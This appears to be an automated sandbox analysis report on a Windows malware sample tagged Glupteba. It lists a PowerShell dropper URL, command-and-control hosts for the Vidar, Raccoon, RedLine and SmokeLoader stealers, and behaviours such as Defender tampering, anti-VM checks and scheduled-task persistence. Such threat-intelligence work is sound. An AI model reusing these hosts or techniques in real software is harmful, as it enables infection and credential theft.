glupteba | 31452b50fe8475fa4566b814ed702c6910029ff66db45d3dbb21c2e3ed63594f

Analysis

max time kernel
40s
max time network
154s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 23:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6ADB8AA23FE92E5441F1156CC3FB949E.exe
Size

631KB
MD5

6adb8aa23fe92e5441f1156cc3fb949e
SHA1

11abcec421eee539de1dea494c3159d3bf163881
SHA256

31452b50fe8475fa4566b814ed702c6910029ff66db45d3dbb21c2e3ed63594f
SHA512

316d7a3be61d4a227fdbb4351647467b65ea97df58403273c90ac6319229b2449fed1aec83eaa01eb1e75ac31d7682c3fa954cd1f1fa56c3b02a38de32b5f951

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

vidar

Version

Botnet

937

https://lenak513.tumblr.com/

Attributes

profile_id
937

Extracted

Family

raccoon

Botnet

93d3ccba4a3cbd5e268873fc1760b2335272e198

Attributes

url4cnc
https://telete.in/opa4kiprivatem

rc4.plain

Extracted

Family

redline

Botnet

installs2

65.21.228.92:46802

Extracted

Family

vidar

Version

Botnet

916

https://lenak513.tumblr.com/

Attributes

profile_id
916

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

redline

Botnet

12_08_fatboy

zertypelil.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

Botnet

ls2

salkefard.xyz:80

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2608-291-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/2608-289-0x0000000001540000-0x0000000001E66000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 6 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	792	5604	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6800	5604	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5156	5604	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5516	5604	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6096	5604	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6176	5604	schtasks.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 10 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe	family_redline
behavioral2/memory/2488-258-0x0000000002A30000-0x0000000002A49000-memory.dmp	family_redline
behavioral2/memory/4268-277-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4268-278-0x0000000000418F86-mapping.dmp	family_redline
C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe	family_redline
C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe	family_redline
C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe	family_redline
behavioral2/memory/4080-308-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/4080-310-0x0000000000418F6A-mapping.dmp	family_redline
behavioral2/memory/5876-430-0x0000000000418F7E-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 4280 created 3876 4280 WerFault.exe 5nk6Iter8p0beNiYXHTKvapq.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata: ET MALWARE Unknown - Loader - Check .exe Updated
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 4280 created 3876	4280	WerFault.exe	5nk6Iter8p0beNiYXHTKvapq.exe

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1436-210-0x00000000049F0000-0x0000000004A8D000-memory.dmp	family_vidar
behavioral2/memory/3848-216-0x0000000002EB0000-0x0000000002F4D000-memory.dmp	family_vidar
behavioral2/memory/3848-244-0x0000000000400000-0x0000000002D16000-memory.dmp	family_vidar
behavioral2/memory/1436-247-0x0000000000400000-0x0000000002D17000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 29 IoCs

Processes:

WerFault.exeppxDDFjTf3nUIwbiUiAklr8a.exera3wCNQNgLlVAScREtS1CvQU.exeUQ98lgbhxp4lsxi8ZL7_1kFc.exegxAhyHm5e53G3khUNI2WHNvw.exexp3mHcdLtImf6VJREk8CgMcU.exeVlUK18HKZY2z7RGvi4jt9Btg.exeJ8ItzY46z87Ncj8CgFwUAvPe.exeNPZFrIefelB6sBQNQWP_LKBD.exe7knkrgEiWvE9h5CLtmtxkW1T.exeZQWAaROBcV8sI9JaW4u63Lfm.exeRpQewr0gAmgdT5I57ngeQ4vF.exeRe5t94DsPfv_6HvIkcZAgFMJ.exewoJpAwNuhUDLoUM_zWsw5B7h.exek83wPQQogP6CmKwq6_GFcJGx.exe1SnDYW6Whsv1Izd3oaZ9zcUM.exeWerFault.exe5nk6Iter8p0beNiYXHTKvapq.exeEqngX1s6LSD5X9CDKyP2jznV.exe3ADqDvEdKz6OdKmQLNPcMs9h.exeZjXPy03ZyMBg4NaWiP53nV9i.exebV51xpcQbneJHY7GGPOoCNMB.exe_fq6YP3D659a_PgfU09uTrV2.exe1SnDYW6Whsv1Izd3oaZ9zcUM.exechrome.exemd8_8eus.exejooyu.exeiPsxVMBE73ZO82SZf1wBmAF6.exeRpQewr0gAmgdT5I57ngeQ4vF.exe

pid	process
2644	WerFault.exe
2488	ppxDDFjTf3nUIwbiUiAklr8a.exe
3964	ra3wCNQNgLlVAScREtS1CvQU.exe
2392	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
4100	gxAhyHm5e53G3khUNI2WHNvw.exe
2052	xp3mHcdLtImf6VJREk8CgMcU.exe
4108	VlUK18HKZY2z7RGvi4jt9Btg.exe
2608	J8ItzY46z87Ncj8CgFwUAvPe.exe
2660	NPZFrIefelB6sBQNQWP_LKBD.exe
1408	7knkrgEiWvE9h5CLtmtxkW1T.exe
3980	ZQWAaROBcV8sI9JaW4u63Lfm.exe
2372	RpQewr0gAmgdT5I57ngeQ4vF.exe
1436	Re5t94DsPfv_6HvIkcZAgFMJ.exe
1588	woJpAwNuhUDLoUM_zWsw5B7h.exe
2412	k83wPQQogP6CmKwq6_GFcJGx.exe
1728	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
3860	WerFault.exe
3876	5nk6Iter8p0beNiYXHTKvapq.exe
1732	EqngX1s6LSD5X9CDKyP2jznV.exe
3848	3ADqDvEdKz6OdKmQLNPcMs9h.exe
2632	ZjXPy03ZyMBg4NaWiP53nV9i.exe
3928	bV51xpcQbneJHY7GGPOoCNMB.exe
4188	_fq6YP3D659a_PgfU09uTrV2.exe
4908	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
5044	chrome.exe
5072	md8_8eus.exe
3920	jooyu.exe
4268	iPsxVMBE73ZO82SZf1wBmAF6.exe
2720	RpQewr0gAmgdT5I57ngeQ4vF.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/5072-241-0x0000000000400000-0x000000000067D000-memory.dmp	vmprotect
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	vmprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VlUK18HKZY2z7RGvi4jt9Btg.exegxAhyHm5e53G3khUNI2WHNvw.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VlUK18HKZY2z7RGvi4jt9Btg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VlUK18HKZY2z7RGvi4jt9Btg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	gxAhyHm5e53G3khUNI2WHNvw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	gxAhyHm5e53G3khUNI2WHNvw.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6ADB8AA23FE92E5441F1156CC3FB949E.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	6ADB8AA23FE92E5441F1156CC3FB949E.exe

Loads dropped DLL 1 IoCs

Processes:

_fq6YP3D659a_PgfU09uTrV2.exe

pid process

4188 _fq6YP3D659a_PgfU09uTrV2.exe

pid	process
4188	_fq6YP3D659a_PgfU09uTrV2.exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe	themida
behavioral2/memory/4100-246-0x0000000001110000-0x0000000001111000-memory.dmp	themida
behavioral2/memory/4108-249-0x0000000000E50000-0x0000000000E51000-memory.dmp	themida
C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe	themida
C:\Users\Admin\Documents\VlUK18HKZY2z7RGvi4jt9Btg.exe	themida
C:\Users\Admin\Documents\gxAhyHm5e53G3khUNI2WHNvw.exe	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

gxAhyHm5e53G3khUNI2WHNvw.exeVlUK18HKZY2z7RGvi4jt9Btg.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gxAhyHm5e53G3khUNI2WHNvw.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VlUK18HKZY2z7RGvi4jt9Btg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ipinfo.io
120 ip-api.com
169 ipinfo.io
171 ipinfo.io
21 ipinfo.io
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

gxAhyHm5e53G3khUNI2WHNvw.exeVlUK18HKZY2z7RGvi4jt9Btg.exe

pid process

4100 gxAhyHm5e53G3khUNI2WHNvw.exe
4108 VlUK18HKZY2z7RGvi4jt9Btg.exe

flow	ioc
22	ipinfo.io
120	ip-api.com
169	ipinfo.io
171	ipinfo.io
21	ipinfo.io

pid	process
4100	gxAhyHm5e53G3khUNI2WHNvw.exe
4108	VlUK18HKZY2z7RGvi4jt9Btg.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

1SnDYW6Whsv1Izd3oaZ9zcUM.exeWerFault.exe

description	pid	process	target process
PID 1728 set thread context of 4908	1728	1SnDYW6Whsv1Izd3oaZ9zcUM.exe	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
PID 2644 set thread context of 4268	2644	WerFault.exe	iPsxVMBE73ZO82SZf1wBmAF6.exe

Drops file in Program Files directory 64 IoCs

Processes:

_fq6YP3D659a_PgfU09uTrV2.exeUQ98lgbhxp4lsxi8ZL7_1kFc.exe

description	ioc	process
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_equalizer.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
File created	C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\common.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\index.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\error_window.html	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\regstr	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\simplexml.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	_fq6YP3D659a_PgfU09uTrV2.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll	_fq6YP3D659a_PgfU09uTrV2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 30 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4320	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
4280	3876	WerFault.exe	5nk6Iter8p0beNiYXHTKvapq.exe
4876	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
4204	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
4416	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
4348	1436	WerFault.exe	Re5t94DsPfv_6HvIkcZAgFMJ.exe
5040	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
3284	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
4720	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
2644	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
5620	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
5920	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
5908	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
5212	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
3860	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
6012	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
4980	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
4116	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
4920	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
4804	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
5988	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
5964	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
2800	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
4468	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
5448	1436	WerFault.exe	Re5t94DsPfv_6HvIkcZAgFMJ.exe
4688	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
3860	1408	WerFault.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
4604	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
6136	3848	WerFault.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
6048	2660	WerFault.exe	NPZFrIefelB6sBQNQWP_LKBD.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Documents\_fq6YP3D659a_PgfU09uTrV2.exe	nsis_installer_2
C:\Users\Admin\Documents\_fq6YP3D659a_PgfU09uTrV2.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1SnDYW6Whsv1Izd3oaZ9zcUM.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1SnDYW6Whsv1Izd3oaZ9zcUM.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

792 schtasks.exe
6800 schtasks.exe
5156 schtasks.exe
5516 schtasks.exe
6096 schtasks.exe
6176 schtasks.exe
4380 schtasks.exe
2648 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4688 timeout.exe
6992 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

6448 bitsadmin.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2748 taskkill.exe
656 taskkill.exe
6524 taskkill.exe
5856 taskkill.exe

pid	process
792	schtasks.exe
6800	schtasks.exe
5156	schtasks.exe
5516	schtasks.exe
6096	schtasks.exe
6176	schtasks.exe
4380	schtasks.exe
2648	schtasks.exe

pid	process
4688	timeout.exe
6992	timeout.exe

pid	process
6448	bitsadmin.exe

pid	process
2748	taskkill.exe
656	taskkill.exe
6524	taskkill.exe
5856	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

6ADB8AA23FE92E5441F1156CC3FB949E.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	6ADB8AA23FE92E5441F1156CC3FB949E.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c